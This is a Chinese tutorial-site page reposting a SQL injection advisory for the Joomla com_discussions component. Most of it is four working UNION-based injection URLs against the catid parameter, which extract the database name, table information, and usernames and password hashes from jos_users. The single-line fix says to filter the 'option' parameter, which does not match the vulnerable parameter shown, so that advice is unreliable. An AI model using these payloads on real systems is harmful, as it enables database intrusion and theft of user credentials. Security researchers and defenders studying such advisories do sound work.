网站地图    收藏   

主页 > 后端 > 网站安全 >

Joomla讨论组件com_discussions SQL注射及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: Joomla Discussions Component (com_discussions) SQL Injection Vulnerability作者: Red Security TEAM www.2cto.com下载地址: http://extensions.joomla.org/extensions/communication/foru......

标题: Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
作者: Red Security TEAM www.2cto.com
下载地址: http://extensions.joomla.org/extensions/communication/forum/13560
测试平台: CentOS
测试示例:
# http://www.2cto.com /index.php?option=com_discussions&view=thread&catid=[SQLi]
#
示例:
#
# 1. [Get Database Name]
# http://www.2cto.com /index.php?option=com_discussions&view=thread&catid=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [Get  Tables  Name]
# http://www.2cto.com /index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F7574706F7374715F6F65646576)--+a
# 3. [Get      Username]
# http://www.2cto.com /index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.username as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
# 4. [Get      Password]
# http://www.2cto.com /index.php?option=com_discussions&view=thread&catid=1' union all select (select concat(0x7e,0x27,unhex(Hex(cast(jos_users.password as char))),0x27,0x7e) from `[Database Name]`.jos_users Order by username limit 0,1) --+a
#
www.2cto.com提供修复方案:
 
过滤index.php页面的option参数输入

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论